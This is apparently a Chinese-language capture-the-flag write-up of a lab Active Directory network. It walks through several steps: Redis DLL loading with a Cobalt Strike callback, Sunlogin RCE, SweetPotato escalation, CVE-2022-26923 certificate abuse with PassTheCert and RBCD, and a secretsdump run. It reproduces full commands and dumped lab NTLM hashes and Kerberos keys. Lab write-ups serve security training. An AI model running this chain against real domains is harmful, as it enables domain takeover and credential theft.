公网:flag1

给了ip,先扫端口。

有redis未授权,是windows,考虑写dll进去,然后走BGREWRITEAOF或BGSAVE时加载dll,从而反连到公网ip。

raw.githubusercontent.com

说得对,但是为什么要用windows(生气

给一个cs的shellcode,分配内存,写入,调用。

💡 这里编译时,需要修改几个选项才能正常使用((

通过redis主从连接写入

GitHub - r35tart/RedisWriteFile: 通过 Redis 主从写出无损文件

通过 Redis 主从写出无损文件. Contribute to r35tart/RedisWriteFile development by creating an account on GitHub.

client连上,bgsave一下,就有cs了。

管理员权限,flag1到手。

加了个用户,rdp连进去,传上去一个fscan开扫。

内网结果:

Text
[2025-04-07 12:11:56] [HOST] 目标:172.22.12.6 状态:alive 详情:protocol=ICMP[2025-04-07 12:11:56] [HOST] 目标:172.22.12.12 状态:alive 详情:protocol=ICMP[2025-04-07 12:11:57] [HOST] 目标:172.22.12.25 状态:alive 详情:protocol=ICMP[2025-04-07 12:11:57] [HOST] 目标:172.22.12.31 状态:alive 详情:protocol=ICMP[2025-04-07 12:11:59] [PORT] 目标:172.22.12.6 状态:open 详情:port=88[2025-04-07 12:11:59] [PORT] 目标:172.22.12.12 状态:open 详情:port=80[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=80[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=21[2025-04-07 12:11:59] [SERVICE] 目标:172.22.12.31 状态:identified 详情:banner=220 Microsoft FTP Service., port=21, service=ftp, product=Microsoft ftpd, os=Windows[2025-04-07 12:12:00] [PORT] 目标:172.22.12.6 状态:open 详情:port=135[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=135[2025-04-07 12:12:00] [PORT] 目标:172.22.12.12 状态:open 详情:port=135[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=135[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=139[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=139[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=139[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=139[2025-04-07 12:12:01] [PORT] 目标:172.22.12.31 状态:open 详情:port=445[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=445[2025-04-07 12:12:01] [PORT] 目标:172.22.12.25 状态:open 详情:port=445[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=445[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=389[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=88, service=unknown[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=80, service=http[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=80, service=http[2025-04-07 12:12:05] [PORT] 目标:172.22.12.25 状态:open 详情:port=6379[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, service=unknown, banner=.[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=139, service=unknown, banner=.[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:banner=., port=139, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:banner=., port=139, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=445, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=445, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=445, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=unknown[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap[2025-04-07 12:12:10] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=6379, service=redis, version=3.0.504, product=Redis key-value store[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=135, service=unknown[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=135, service=unknown[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=135, service=unknown[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=135, service=unknown[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:hostname=WIN-SERVER, ipv4=[172.22.12.6], ipv6=[][2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:hostname=WIN-AUTHORITY, ipv4=[172.22.12.12], ipv6=[][2025-04-07 12:13:06] [VULN] 目标:http://172.22.12.12:80 状态:vulnerable 详情:author=AgeloVito, references=[https://www.cnblogs.com/EasonJim/p/6859345.html], vulnerability_type=poc-yaml-active-directory-certsrv-detect, vulnerability_name=[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:ipv6=[], hostname=WIN-YUYAOX9Q, ipv4=[172.22.12.25][2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:07 GMT etag:"bc9379eff5fdb1:0" last-modified:Mon, 06 Jan 2025 05:55:41 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.31[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:06 GMT etag:"a6e63f4642ebd81:0" last-modified:Sat, 29 Oct 2022 02:58:08 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.12, status_code=200, length=703[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:hostname=WIN-IISQE3PC, ipv4=[172.22.12.31], ipv6=[][2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=smb, os=Windows Server 2016 Standard 14393[2025-04-07 12:13:08] [VULN] 目标:172.22.12.31 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[SunloginClient_11.0.0.33826_x64.exe], port=21, service=ftp[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, domain_name=WORKGROUP, workstation_service=WIN-IISQE3PC, server_service=WIN-IISQE3PC[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:computer_name=WIN-SERVER.xiaorang.lab, server_service=WIN-SERVER, domain_controllers=XIAORANG, os_version=Windows Server 2016 Standard 14393, port=139, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-SERVER, workstation_service=WIN-SERVER[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.12 状态:identified 详情:domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-AUTHORITY, workstation_service=WIN-AUTHORITY, server_service=WIN-AUTHORITY, os_version=Windows Server 2016 Datacenter 14393, port=139, computer_name=WIN-AUTHORITY.xiaorang.lab[2025-04-07 12:13:13] [VULN] 目标:172.22.12.25 状态:vulnerable 详情:port=6379, service=redis, type=unauthorized

所以内网机器:

Text
172.22.12.6 域控 WIN-SERVER.xiaorong.lab172.22.12.12 CA服务器(poc-yaml-active-directory-certsrv-detect )172.22.12.25 出口机(Redis未授权访问)172.22.12.31 ftp(有一个文件SunloginClient)

向日葵rce:flag02

找了下向日葵相关,有一个rce。

GitHub - Mr-xn/sunlogin_rce: 向日葵 RCE

向日葵 RCE. Contribute to Mr-xn/sunlogin_rce development by creating an account on GitHub.

编译,丢上去扫

system权限。看了下没接入域,没东西,直接拿flag。

剩下三台都是有域控的。打域控先搜集信息。

信息搜集

whoami /priv后发现SeImpersonatePrivilege,于是SweetPotato提权。

SweetPotato/SweetPotato-Webshell-new/bin/Release at master · uknowsec/SweetPotato

Modifying SweetPotato to support load shellcode and webshell - uknowsec/SweetPotato

又上cs(

跑sharphound,走bloodhound提取信息。

没有什么明显的路径。但是似乎有个ca server有洞。

CA Server:CVE-2022-26923(flag04)

这是一个 Active Directory 域权限提升漏洞,通过滥用 Active Directory 证书服务 (AD CS) 来请求具有任意攻击者控制的 DNS 主机名的计算机证书,这可以使域中的任何计算机帐户模拟域控制器,从而实现完全的域接管。

CA信息

攻击过程

  1. 抓哈希。获取现有机器哈希值。
Text
	 * Username : WIN-YUYAOX9Q$	 * Domain   : XIAORANG	 * NTLM     : e611213c6a712f9b18a8d056005a4f0f	 * SHA1     : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9
  1. 用现有机器账号创建新的机器账号。
    • pth攻击:通过hash通过身份验证
    • 创建新机器账号
  1. 申请一个证书
  1. 拿下了…?

会报错,原因是域控制器没有安装用于智能卡身份验证的证书 ,尝试schannel,通过schannel传递证书。

PassTheCert/Python at main · AlmondOffSec/PassTheCert

Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through Schannel - AlmondOffSec/PassTheCert

用这个

Text
proxychains4 -q python pass_the_cert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6proxychains4 -q python pass_the_cert.py  -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'libr$'

然后正常的申请ST,导入票据,即可无密码登录

导入票据,拿到flag4

域控 flag03

dump sam

Text
proxychains4 -q python examples/secretsdump.py 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -kImpacket v0.13.0.dev0+20250404.133223.00ced47 - Copyright Fortra, LLC and its affiliated companies[*] Service RemoteRegistry is in stopped state[*] Starting service RemoteRegistry[*] Target system bootKey: 0x3d0b51771c180c3bfcb89c8258922751[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:d418e6aaeff1177bee5f84cf0466802c:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACCXIAORANG\WIN-SERVER$:plain_password_hex:c8af46916615d6c0f20c37b50eada8e87ba37f27483b0ff9537cb66a8f680a0b427b80e5d4cbe080fb0b0ec0382453bcfef20dd2fa9cf3415a5120661952615db594724ea6d7a55348ac8f5f6fb410201158c306975a3045c7a5770f096bd6c59813b93a2e337e2eea26495b5d4c76877804a042de567b58fd7463da84e10b9e12d6a443033d5675633f4654126ee26a65c198c0d80947b366d75a0df141202bd4f1666b0d16fa84323347293727d178c087cd50b5ed74de331a08bd1296af911b98e6a9d59fa20fd4c090cf7ecc52b338070fff6580b0c03f48a0d4086a36e2f7bcc3bc1cb92f1a567fec3516f9a1cfXIAORANG\WIN-SERVER$:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::[*] DPAPI_SYSTEMdpapi_machinekey:0x1013bf8bbf66971ac0c6c4938c9c187c859ef5b7dpapi_userkey:0xfd5a847b92da1e611b6a94df40e674f00b7054f8[*] NL$KM 0000   9D 83 14 71 4B 67 2E 66  8B 36 79 E5 74 94 DF CE   ...qKg.f.6y.t... 0010   F8 0F 28 EC 6A 7A 89 28  4F F7 D1 07 B7 9A B8 6E   ..(.jz.(O......n 0020   14 76 A6 CC 5E 52 A4 86  86 55 3A C1 37 51 5D 87   .v..^R...U:.7Q]. 0030   3D 33 6E A7 45 EE 79 E8  89 60 CC A6 AA 98 58 EE   =3n.E.y..`....X.NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a12e9453c13fc38f271f91059d9876d5:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::zhangling:1105:aad3b435b51404eeaad3b435b51404ee:07d308b46637d5a5035f1723d23dd274:::WIN-SERVER$:1000:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::WIN-YUYAOX9Q$:1103:aad3b435b51404eeaad3b435b51404ee:e611213c6a712f9b18a8d056005a4f0f:::WIN-AUTHORITY$:1104:aad3b435b51404eeaad3b435b51404ee:961cec4c991735bb30a01a87755db088:::libr$:1106:aad3b435b51404eeaad3b435b51404ee:8cfe95318f473953c652fb55318f4371:::[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:931811f533238603f8b5158286cf9ad36ce6a57e4f27ec79450579e0b05893ebAdministrator:aes128-cts-hmac-sha1-96:068731dadb1705703176cfc37a5c5450Administrator:des-cbc-md5:256dfbb0f87aef29krbtgt:aes256-cts-hmac-sha1-96:1a711447ae68067f6212ca0e9eb30c85443d65ad7546e6fa9e3b7024199f7e2ekrbtgt:aes128-cts-hmac-sha1-96:b50c4f039acd8413cc01725d9cc9be9dkrbtgt:des-cbc-md5:c285a826dac4fe58zhangling:aes256-cts-hmac-sha1-96:ae14f076559febbb8e32d87b1751160e64e95bec8ada9f3ba74c37c6e9f53874zhangling:aes128-cts-hmac-sha1-96:a8bf7463f1b20a7c1cae3f1ab8ce9ed8zhangling:des-cbc-md5:e0f4d534bc3bd0e5WIN-SERVER$:aes256-cts-hmac-sha1-96:92f078626759fadaafdfb210c729858cbd3c2dc63a98885a6e45af12f5f920e3WIN-SERVER$:aes128-cts-hmac-sha1-96:7f134e7e6467c3eb76adeb422a08c4a0WIN-SERVER$:des-cbc-md5:1a83f8c2467a547cWIN-YUYAOX9Q$:aes256-cts-hmac-sha1-96:4c58dac71ff0e6765509efd6b3977782df8ab54ef0fda0b9f9317015d509fbcfWIN-YUYAOX9Q$:aes128-cts-hmac-sha1-96:072d1926fb98407684a30c2312ca2199WIN-YUYAOX9Q$:des-cbc-md5:b97fa1f29e9b311cWIN-AUTHORITY$:aes256-cts-hmac-sha1-96:206906767424e178d150d42b658a123cd791a16bffa06b858ec1bf9220b791d2WIN-AUTHORITY$:aes128-cts-hmac-sha1-96:4edb0c133055745a917c09f4840ef99cWIN-AUTHORITY$:des-cbc-md5:c2fe325ea16d7aealibr$:aes256-cts-hmac-sha1-96:cfcc383f9f8d6908264768c7a536002869fc26359d5d32e67c8c657c95affc9flibr$:aes128-cts-hmac-sha1-96:b3f893d4a827eaa41203c0a22ad7030elibr$:des-cbc-md5:1a92830ea8e675d9[*] Cleaning up...

于是有了域控Administrator的hash。aa95e708a5182931157a526acf769b13

pth登录。

参考资料?

攻城肾透shi | sv3nbeast

Let's move in life. 不在平静中灭亡~

https://www.freebuf.com/articles/web/249782.html

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy